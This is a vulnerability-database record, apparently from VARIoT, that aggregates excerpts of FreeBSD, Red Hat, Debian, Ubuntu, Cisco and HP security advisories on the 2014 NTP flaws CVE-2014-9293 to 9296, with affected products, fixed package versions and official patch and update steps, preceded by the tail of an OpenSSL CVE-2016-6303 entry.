"https://www.openssl.org/policies/releasestrat.html)," }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6307" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6303" }, { "db": "BID", "id": "92984" }, { "db": "JVNDB", "id": "JVNDB-2016-004782" }, { "db": "PACKETSTORM", "id": "140151" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-6303" }, { "db": "CNNVD", "id": "CNNVD-201609-320" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-6303" }, { "db": "BID", "id": "92984" }, { "db": "JVNDB", "id": "JVNDB-2016-004782" }, { "db": "PACKETSTORM", "id": "140151" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-6303" }, { "db": "CNNVD", "id": "CNNVD-201609-320" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-09-16T00:00:00", "db": "VULMON", "id": "CVE-2016-6303" }, { "date": "2016-08-20T00:00:00", "db": "BID", "id": "92984" }, { "date": "2016-09-21T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004782" }, { "date": "2016-12-14T12:12:12", "db": "PACKETSTORM", "id": "140151" }, { "date": "2016-09-22T22:22:00", "db": "PACKETSTORM", "id": "138817" }, { "date": "2016-09-22T22:25:00", "db": "PACKETSTORM", "id": "138820" }, { "date": "2016-09-23T19:19:00", "db": "PACKETSTORM", "id": "138826" }, { "date": "2016-09-22T12:12:12", "db": "PACKETSTORM", "id": "169633" }, { "date": "2016-09-16T05:59:13.363000", "db": "NVD", "id": "CVE-2016-6303" }, { "date": "2016-09-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201609-320" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-02-12T00:00:00", "db": "VULMON", "id": "CVE-2016-6303" }, { "date": "2018-02-05T15:00:00", "db": "BID", "id": "92984" }, { "date": "2017-10-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004782" }, { "date": "2023-02-12T23:24:31.920000", "db": "NVD", "id": "CVE-2016-6303" }, { "date": "2023-02-13T00:00:00", "db": "CNNVD", "id": "CNNVD-201609-320" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "CNNVD", "id": "CNNVD-201609-320" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of crypto/mdc2/mdc2dgst.c of MDC2_Update Integer overflow vulnerability in functions", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004782" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201609-320" } ], "trust": 0.6 } }
var-201412-0614
Vulnerability from variot
util/ntp-keygen.c in ntp-keygen in NTP before 4.2.7p230 uses a weak RNG seed, which makes it easier for remote attackers to defeat cryptographic protection mechanisms via a brute-force attack. The NTP Project ntpd version 4.2.7 and pervious versions contain several vulnerabilities. ntp-keygen prior to version 4.2.7p230 also uses a non-cryptographic random number generator when generating symmetric keys. These vulnerabilities may affect ntpd acting as a server or client. Supplementary information : CWE Vulnerability type by CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) Has been identified. http://cwe.mitre.org/data/definitions/338.htmlA brute force attack by a third party (Brute force attack) May break the cryptographic protection mechanism. NTP is prone to a predictable random number generator weakness. An attacker can exploit this issue to guess generated MD5 keys that could then be used to spoof an NTP client or server. Corrected: 2014-14-22 19:07:16 UTC (stable/10, 10.1-STABLE) 2014-12-23 22:56:01 UTC (releng/10.1, 10.1-RELEASE-p3) 2014-12-23 22:55:14 UTC (releng/10.0, 10.0-RELEASE-p15) 2014-14-22 19:08:09 UTC (stable/9, 9.3-STABLE) 2014-12-23 22:54:25 UTC (releng/9.3, 9.3-RELEASE-p7) 2014-12-23 22:53:44 UTC (releng/9.2, 9.2-RELEASE-p17) 2014-12-23 22:53:03 UTC (releng/9.1, 9.1-RELEASE-p24) 2014-14-22 19:08:09 UTC (stable/8, 8.4-STABLE) 2014-12-23 22:52:22 UTC (releng/8.4, 8.4-RELEASE-p21) CVE Name: CVE-2014-9293, CVE-2014-9294, CVE-2014-9295, CVE-2014-9296
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
II. [CVE-2014-9293] The ntp-keygen(8) utility is also affected by a similar issue. [CVE-2014-9294]
When Autokey Authentication is enabled, for example if ntp.conf(5) contains a 'crypto pw' directive, a remote attacker can send a carefully crafted packet that can overflow a stack buffer. [CVE-2014-9296]
III. Impact
The NTP protocol uses keys to implement authentication. The weak seeding of the pseudo-random number generator makes it easier for an attacker to brute-force keys, and thus may broadcast incorrect time stamps or masquerade as another time server. [CVE-2014-9295]
IV. Workaround
No workaround is available, but systems not running ntpd(8) are not affected. Because the issue may lead to remote root compromise, the FreeBSD Security Team recommends system administrators to firewall NTP ports, namely tcp/123 and udp/123 when it is not clear that all systems have been patched or have ntpd(8) stopped.
V.
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch
fetch https://security.FreeBSD.org/patches/SA-14:31/ntp.patch.asc
gpg --verify ntp.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart the ntpd(8) daemons, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r276073 releng/8.4/ r276154 stable/9/ r276073 releng/9.1/ r276155 releng/9.2/ r276156 releng/9.3/ r276157 stable/10/ r276072 releng/10.0/ r276158 releng/10.1/ r276159
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. This situation may be exploitable by an attacker (CVE-2014-9296).
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9293 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9294 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9295 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9296 http://advisories.mageia.org/MGASA-2014-0541.html
Updated Packages:
Mandriva Business Server 1/X86_64: 25fe56fc0649ac9bb83be467969c2380 mbs1/x86_64/ntp-4.2.6p5-8.1.mbs1.x86_64.rpm 9409f5337bc2a2682e09db81e769cd5c mbs1/x86_64/ntp-client-4.2.6p5-8.1.mbs1.x86_64.rpm df65cc9c536cdd461e1ef95318ab0d3b mbs1/x86_64/ntp-doc-4.2.6p5-8.1.mbs1.x86_64.rpm 53f446bffdf6e87726a9772e946c5e34 mbs1/SRPMS/ntp-4.2.6p5-8.1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. 6.5) - i386, noarch, ppc64, s390x, x86_64
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: ntp security update Advisory ID: RHSA-2014:2024-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-2024.html Issue date: 2014-12-20 CVE Names: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296 =====================================================================
- Summary:
Updated ntp packages that fix several security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
- Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time with a referenced time source.
Multiple buffer overflow flaws were discovered in ntpd's crypto_recv(), ctl_putdata(), and configure() functions. A remote attacker could use either of these flaws to send a specially crafted request packet that could crash ntpd or, potentially, execute arbitrary code with the privileges of the ntp user. Note: the crypto_recv() flaw requires non-default configurations to be active, while the ctl_putdata() flaw, by default, can only be exploited via local attackers, and the configure() flaw requires additional authentication to exploit. (CVE-2014-9295)
It was found that ntpd automatically generated weak keys for its internal use if no ntpdc request authentication key was specified in the ntp.conf configuration file. A remote attacker able to match the configured IP restrictions could guess the generated key, and possibly use it to send ntpdc query or configuration requests. (CVE-2014-9293)
It was found that ntp-keygen used a weak method for generating MD5 keys. Note: it is recommended to regenerate any MD5 keys that had explicitly been generated with ntp-keygen; the default installation does not contain such keys). (CVE-2014-9294)
A missing return statement in the receive() function could potentially allow a remote attacker to bypass NTP's authentication mechanism. (CVE-2014-9296)
All ntp users are advised to upgrade to this updated package, which contains backported patches to resolve these issues. After installing the update, the ntpd daemon will restart automatically.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1176032 - CVE-2014-9293 ntp: automatic generation of weak default key in config_auth() 1176035 - CVE-2014-9294 ntp: ntp-keygen uses weak random number generator and seed when generating MD5 keys 1176037 - CVE-2014-9295 ntp: Multiple buffer overflows via specially-crafted packets 1176040 - CVE-2014-9296 ntp: receive() missing return on error
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ntp-4.2.6p5-2.el6_6.src.rpm
i386: ntp-4.2.6p5-2.el6_6.i686.rpm ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntpdate-4.2.6p5-2.el6_6.i686.rpm
x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntp-perl-4.2.6p5-2.el6_6.i686.rpm
noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ntp-4.2.6p5-2.el6_6.src.rpm
x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ntp-4.2.6p5-2.el6_6.src.rpm
i386: ntp-4.2.6p5-2.el6_6.i686.rpm ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntpdate-4.2.6p5-2.el6_6.i686.rpm
ppc64: ntp-4.2.6p5-2.el6_6.ppc64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm ntpdate-4.2.6p5-2.el6_6.ppc64.rpm
s390x: ntp-4.2.6p5-2.el6_6.s390x.rpm ntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm ntpdate-4.2.6p5-2.el6_6.s390x.rpm
x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntp-perl-4.2.6p5-2.el6_6.i686.rpm
noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-2.el6_6.ppc64.rpm ntp-perl-4.2.6p5-2.el6_6.ppc64.rpm
s390x: ntp-debuginfo-4.2.6p5-2.el6_6.s390x.rpm ntp-perl-4.2.6p5-2.el6_6.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ntp-4.2.6p5-2.el6_6.src.rpm
i386: ntp-4.2.6p5-2.el6_6.i686.rpm ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntpdate-4.2.6p5-2.el6_6.i686.rpm
x86_64: ntp-4.2.6p5-2.el6_6.x86_64.rpm ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntpdate-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: ntp-debuginfo-4.2.6p5-2.el6_6.i686.rpm ntp-perl-4.2.6p5-2.el6_6.i686.rpm
noarch: ntp-doc-4.2.6p5-2.el6_6.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-2.el6_6.x86_64.rpm ntp-perl-4.2.6p5-2.el6_6.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: ntp-4.2.6p5-19.el7_0.src.rpm
x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: ntp-4.2.6p5-19.el7_0.src.rpm
x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: ntp-4.2.6p5-19.el7_0.src.rpm
ppc64: ntp-4.2.6p5-19.el7_0.ppc64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm ntpdate-4.2.6p5-19.el7_0.ppc64.rpm
s390x: ntp-4.2.6p5-19.el7_0.s390x.rpm ntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm ntpdate-4.2.6p5-19.el7_0.s390x.rpm
x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-19.el7_0.ppc64.rpm sntp-4.2.6p5-19.el7_0.ppc64.rpm
s390x: ntp-debuginfo-4.2.6p5-19.el7_0.s390x.rpm sntp-4.2.6p5-19.el7_0.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: ntp-4.2.6p5-19.el7_0.src.rpm
x86_64: ntp-4.2.6p5-19.el7_0.x86_64.rpm ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm ntpdate-4.2.6p5-19.el7_0.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: ntp-doc-4.2.6p5-19.el7_0.noarch.rpm ntp-perl-4.2.6p5-19.el7_0.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-19.el7_0.x86_64.rpm sntp-4.2.6p5-19.el7_0.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-9293 https://access.redhat.com/security/cve/CVE-2014-9294 https://access.redhat.com/security/cve/CVE-2014-9295 https://access.redhat.com/security/cve/CVE-2014-9296 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFUlOKcXlSAg2UNWIIRAvBoAKCfw+j4ua5JaIRMc5eKkny9G1yWlgCgufNc EvBImTd+Vq7//UExow1FP4U= =m/Eb -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
On December 19, 2014, NTP.org and US-CERT released security advisories detailing two issues regarding weak cryptographic pseudorandom number generation (PRNG), three buffer overflow vulnerabilities, and an unhandled error condition with an unknown impact.
Cisco will release free software updates that address these vulnerabilities.
Workarounds that mitigate these vulnerabilities are available. Attackers could use this key to reconfigure ntpd (or to exploit other vulnerabilities).
The default ntpd configuration in Debian restricts access to localhost (and possible the adjacent network in case of IPv6).
For the stable distribution (wheezy), these problems have been fixed in version 1:4.2.6.p5+dfsg-2+deb7u1.
We recommend that you upgrade your ntp packages. ============================================================================ Ubuntu Security Notice USN-2449-1 December 22, 2014
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
Several security issues were fixed in NTP. The default compiler options for affected releases should reduce the vulnerability to a denial of service. In addition, attackers would be isolated by the NTP AppArmor profile. (CVE-2014-9295)
Stephen Roettger discovered that NTP incorrectly continued processing when handling certain errors. (CVE-2014-9296)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.10: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.10.1
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.1
Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.2
Ubuntu 10.04 LTS: ntp 1:4.2.4p8+dfsg-1ubuntu2.2
After a standard system update you need to regenerate any MD5 keys that were manually created with ntp-keygen. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04574882
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04574882 Version: 1
HPSBPV03266 rev.1 - Certain HP Networking and H3C Switches and Routers running NTP, Remote Execution of Code, Disclosure of Information, and Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-02-18 Last Updated: 2015-02-18
Potential Security Impact: Remote execution of code and disclosure of information and denial of service (DoS)
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with certain HP Networking and H3C switches and routers running NTP. The vulnerabilities could be exploited remotely to allow execution of code, disclosure of information and denial of service (DoS).
References:
CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 VU#852879 SSRT101878
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. See resolution table
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2014-9293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9294 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9295 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided a mitigation for the impacted HP and H3C products.
Mitigation for impacted products: disable NTP, until an update is available.
Family Fixed Version HP Branded Products Impacted H3C Branded Products Impacted 3Com Branded Products Impacted
12900 Switch Series Fix in Progress, Use Mitigation JG619A HP FF 12910 Switch AC Chassis, JG621A HP FF 12910 Main Processing Unit, JG632A HP FF 12916 Switch AC Chassis, JG634A HP FF 12916 Main Processing Unit N/A N/A
12500 Fix in Progress, Use Mitigation JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP 12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504 AC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch Chassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis, JF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP 12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JC808A HP 12500 TAA Main Processing Unit H3C S12508 Routing Switch(AC-1) (0235A0GE), H3C S12518 Routing Switch(AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis (0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M) , H3C 12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K) N/A
12500 (Comware v7) Fix in Progress, Use Mitigation JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP 12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504 AC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch Chassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis, JF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP 12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JG497A HP 12500 MPU w/Comware V7 OS, JG782A HP FF 12508E AC Switch Chassis, JG783A HP FF 12508E DC Switch Chassis, JG784A HP FF 12518E AC Switch Chassis, JG785A HP FF 12518E DC Switch Chassis, JG802A HP FF 12500E MPU H3C S12508 Routing Switch(AC-1) (0235A0GE), H3C S12518 Routing Switch(AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis (0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C 12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K) N/A
11900 Switch Series Fix in Progress, Use Mitigation JG608A HP FF 11908-V Switch Chassis, JG609A HP FF 11900 Main Processing Unit N/A N/A
10500 Switch Series (Comware v5) R1208P10 JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP 10504 Switch Chassis, JC614A HP 10500 Main Processing Unit, JC748A HP 10512 Switch Chassis, JG375A HP 10500 TAA Main Processing Unit, JG820A HP 10504 TAA Switch Chassis, JG821A HP 10508 TAA Switch Chassis, JG822A HP 10508-V TAA Switch Chassis, JG823A HP 10512 TAA Switch Chassis N/A N/A
10500 Switch Series (Comware v7) Fix in Progress, Use Mitigation JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP 10504 Switch Chassis, JC748A HP 10512 Switch Chassis, JG820A HP 10504 TAA Switch Chassis, JG821A HP 10508 TAA Switch Chassis, JG822A HP 10508-V TAA Switch Chassis, JG823A HP 10512 TAA Switch Chassis, JG496A HP 10500 Type A MPU w/Comware v7 OS N/A N/A
9500E Fix in Progress, Use Mitigation JC124A HP A9508 Switch Chassis, JC124B HP 9505 Switch Chassis, JC125A HP A9512 Switch Chassis, JC125B HP 9512 Switch Chassis, JC474A HP A9508-V Switch Chassis, JC474B HP 9508-V Switch Chassis H3C S9505E Routing-Switch Chassis (0235A0G6), H3C S9512E Routing-Switch Chassis (0235A0G7), H3C S9508E-V Routing-Switch Chassis (0235A38Q), H3C S9505E Chassis w/ Fans (0235A38P), H3C S9512E Chassis w/ Fans (0235A38R) N/A
8800 Fix in Progress, Use Mitigation JC141A HP 8802 Main Control Unit Module, JC147A HP 8802 Router Chassis, JC147B HP 8802 Router Chassis, JC148A HP A8805 Router Chassis, JC148B HP 8805 Router Chassis, JC137A HP 8805/08/12 (2E) Main Cntrl Unit Mod, JC138A HP 8805/08/12 (1E) Main Cntrl Unit Mod, JC149A HP A8808 Router Chassis, JC149B HP 8808 Router Chassis, JC150A HP A8812 Router Chassis, JC150B HP 8812 Router Chassis H3C Main Control Unit for SR8802 (0231A84N), H3C SR8802 10G Core Router Chassis (0235A31B), H3C SR8802 10G Core Router Chassis (0235A0GC), H3C SR8805 10G Core Router Chassis (0235A31C), H3C SR8805 10G Core Router Chassis (0235A0G8), H3C SR8800 Routing Switch Processing Board(0231A80E), H3C Main Contril Unit for SR8805/08/12 IE (0231A82E), H3C SR8808 10G Core Router Chassis (0235A31D / 0235A0G9, H3C SR8812 10G Core Router Chassis (0235A31E / 0235A0GA) N/A
7900 Fix in Progress, Use Mitigation JG682A HP FlexFabric 7904 Switch Chassis, JH001A HP FF 7910 2.4Tbps Fabric / MPU, JG842A HP FF 7910 7.2Tbps Fabric / MPU, JG841A HP FF 7910 Switch Chassis N/A N/A
7500 Switch Series R6708P10 JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T, JC697A HP A7502 TAA Main Processing Unit, JC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE, JC699A HP A7500 384Gbps TAA Fab/MPU w 2p 10-GbE, JC700A HP A7500 384 Gbps TAA Fabric / MPU, JC701A HP A7510 768 Gbps TAA Fabric / MPU, JD193A HP 384 Gbps A7500 Fab Mod w/2 XFP Ports, JD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports, JD194A HP 384 Gbps Fabric A7500 Module, JD194B HP 7500 384Gbps Fabric Module, JD195A HP 7500 384Gbps Advanced Fabric Module, JD196A HP 7502 Fabric Module, JD220A HP 7500 768Gbps Fabric Module, JD238A HP A7510 Switch Chassis, JD238B HP 7510 Switch Chassis, JD239A HP A7506 Switch Chassis, JD239B HP 7506 Switch Chassis, JD240A HP A7503 Switch Chassis, JD240B HP 7503 Switch Chassis, JD241A HP A7506 Vertical Switch Chassis, JD241B HP 7506-V Switch Chassis, JD242A HP A7502 Switch Chassis, JD242B HP 7502 Switch Chassis, JD243A HP A7503 Switch Chassis w/1 Fabric Slot, JD243B HP 7503-S Switch Chassis w/1 Fabric Slot H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4), H3C S7503E Ethernet Switch Chassis with Fan (0235A0G2), H3C S7503E-S Ethernet Switch Chassis with Fan (0235A0G5), H3C S7506E Ethernet Switch Chassis with Fan (0235A0G1), H3C S7506E-V Ethernet Switch Chassis with Fan (0235A0G3), H3C S7510E Ethernet Switch Chassis with Fan (0235A0G0), H3C S7502E Chassis w/ fans (0235A29A), H3C S7503E Chassis w/ fans (0235A27R), H3C S7503E-S Chassis w/ fans (0235A33R), H3C S7506E Chassis w/ fans (0235A27Q), H3C S7506E-V Chassis w/ fans (0235A27S) N/A
HSR6800 Fix in Progress, Use Mitigation JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A HP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router MPU, JG779A HP HSR6800 RSE-X2 Router TAA MPU N/A N/A
